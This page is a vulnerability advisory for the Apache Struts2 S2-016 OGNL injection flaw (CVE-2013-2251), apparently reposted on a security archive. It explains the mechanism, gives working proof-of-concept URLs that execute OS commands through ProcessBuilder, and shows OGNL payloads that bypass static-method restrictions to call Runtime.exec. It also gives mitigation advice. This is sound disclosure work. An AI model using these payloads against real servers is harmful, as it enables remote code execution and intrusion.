what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Struts2 2.3.15 OGNL Injection

Struts2 2.3.15 OGNL Injection
Posted Aug 13, 2013
Authored by Takeshi Terada

Struts2 suffers from an OGNL injection vulnerability that allows for redirection. Versions 2.0.0 through 2.3.15 are affected.

tags | exploit
advisories | CVE-2013-2251
SHA-256 | 8dd8aee0be9f1818cac60e7eaadec5a677b61944590e6c481865994fb69abbf0

Struts2 2.3.15 OGNL Injection

Change Mirror Download
CVE Number:         CVE-2013-2251
Title: Struts2 Prefixed Parameters OGNL Injection Vulnerability
Affected Software: Apache Struts v2.0.0 - 2.3.15
Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
Issue Status: v2.3.15.1 was released which fixes this vulnerability
Issue ID by Vender: S2-016

Overview:
Struts2 is an open-source web application framework for Java.
Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which
leads to arbitrary Java method execution on the target server. This is
caused by insecure handling of prefixed special parameters (action:,
redirect: and redirectAction:) in DefaultActionMapper class of Struts2.

Details:
<About DefaultActionMapper>

Struts2's ActionMapper is a mechanism for mapping between incoming HTTP
request and action to be executed on the server. DefaultActionMapper is
a default implementation of ActionMapper. It handles four types of
prefixed parameters: action:, redirect:, redirectAction: and method:.

For example, redirect prefix is used for HTTP redirect.

Normal redirect prefix usage in JSP:
<s:form action="foo">
...
<s:submit value="Register"/>
<s:submit name="redirect:http://www.google.com/" value="Cancel"/>
</s:form>

If the cancel button is clicked, redirection is performed.

Request URI for redirection:
/foo.action?redirect:http://www.google.com/

Resopnse Header:
HTTP/1.1 302 Found
Location: http://www.google.com/

Usage of other prefixed parameters is similar to redirect.
See Struts2 document for details.
https://cwiki.apache.org/confluence/display/WW/ActionMapper

<How the Attack Works>

As stated already, there are four types of prefixed parameters.

action:, redirect:, redirectAction:, method:

All except for method: can be used for attacks. But regarding action:,
it can be used only if wildcard mapping is enabled in configuration.
On the one hand, redirect: and redirectAction: are not constrained by
configuration (thus they are convenient for attackers).

One thing that should be noted is that prefixed parameters are quite
forceful. It means that behavior of application which is not intended
to accept prefixed parameters can also be overwritten by prefixed
parameters added to HTTP request. Therefore all Struts2 applications
that use DefaultActionMapper are vulnerable to the attack.

The injection point is name of prefixed parameters.
Example of attack using redirect: is shown below.

Attack URI:
/bar.action?redirect:http://www.google.com/%25{1000-1}

Response Header:
HTTP/1.1 302 Found
Location: http://www.google.com/999

As you can see, expression (1000-1) is evaluated and the result (999)
is appeared in Location response header. As I shall explain later,
more complex attacks such as OS command execution is possible too.

In DefaultActionMapper, name of prefixed parameter is once stored as
ActionMapping object and is later executed as OGNL expression.
Rough method call flow in execution phase is as the following.

org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()
org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()
org.apache.struts2.dispatcher.Dispatcher.serviceAction()
org.apache.struts2.dispatcher.StrutsResultSupport.execute()
org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()
com.opensymphony.xwork2.util.TextParseUtil.translateVariables()
com.opensymphony.xwork2.util.OgnlTextParser.evaluate()

Proof of Concept:
<PoC URLs>

PoC is already disclosed on vender's web page.
https://struts.apache.org/release/2.3.x/docs/s2-016.html

Below PoC URLs are just quotes from the vender's page.

Simple Expression:
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

OS Command Execution:
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

Obviously such attacks are not specific to blank/showcase application,
but all Struts2 based applications may be subject to attacks.

<OS Command Execution and Static Method Call>

Another topic that I think worth mentioning is that PoC URLs use
ProcessBuilder class to execute OS commands. The merit of using this
class is that it does not require static method to execute OS commands,
while Runtime class does require it.

As you may know, static method call in OGNL is basically prohibited.
But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by
a simple trick:

%{#_memberAccess['allowStaticMethodAccess']=true,
@java.lang.Runtime@getRuntime().exec('your commands')}

In Struts v2.3.14.2, SecurityMemberAccess class has been changed to
prevent the trick. However there are still some techniques to call
static method in OGNL.

One technique is to use reflection to replace static method call to
instance method call. Another technique is to overwrite #_memberAccess
object itself rather than property of the object:

%{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),
@java.lang.Runtime@getRuntime().exec('your commands')}

Probably prevention against static method is just an additional layer
of defense, but I think that global objects such as #_memberAccess
should be protected from rogue update.

Timeline:
2013/06/24 Reported to Struts Security ML
2013/07/17 Vender announced v2.3.15.1
2013/08/10 Disclosure of this advisory

Recommendation:
Immediate upgrade to the latest version is strongly recommended as
active attacks have already been observed. It should be noted that
redirect: and redirectAction: parameters were completely dropped and
do not work in the latest version as stated in the vender's page.
Thus attention for compatibility issues is required for upgrade.

If you cannot upgrade your Struts2 immediately, filtering (by custom
servlet filter, IPS, WAF and so on) can be a mitigation solution for
this vulnerability. Some points about filtering solution are listed
below.

- Both %{expr} and ${expr} notation can be used for attacks.
- Parameters both in querystring and in request body can be used.
- redirect: and redirectAction: can be used not only for Java method
execution but also for open redirect.

See S2-017 (CVE-2013-2248) for open redirect issue.
https://struts.apache.org/release/2.3.x/docs/s2-017.html

Reference:
https://struts.apache.org/release/2.3.x/docs/s2-016.html
https://cwiki.apache.org/confluence/display/WW/ActionMapper
Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close